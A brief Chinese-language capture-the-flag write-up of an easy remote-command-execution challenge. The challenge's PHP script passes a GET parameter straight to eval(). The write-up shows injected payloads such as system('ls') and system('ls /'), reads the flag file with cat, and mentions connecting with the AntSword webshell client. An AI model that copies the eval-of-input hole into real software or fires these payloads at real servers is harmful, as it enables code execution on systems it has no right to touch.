这是一道很简单的RCE(远程命令执行),打开题目后可以看到一个php脚本。
<?php
error_reporting(0);
highlight_file(__FILE__);
if(isset($_GET['url']))
{
eval($_GET['url']);
}
?> 直接传入url参数就可以执行相应的命令,先用system函数试试
/?url=system('ls'); 
可以看到,system函数是可以使用的,使用ls命令正常回显了目录下的文件
那么我们看看根目录里面有什么。
/?url=system('ls /');
然后cat命令查看flllllaaaaaaggggggg文件中的内容就可以得到flag
这题也可以使用蚁剑直接连接就能查看目录,从而得到flag。
本题完。
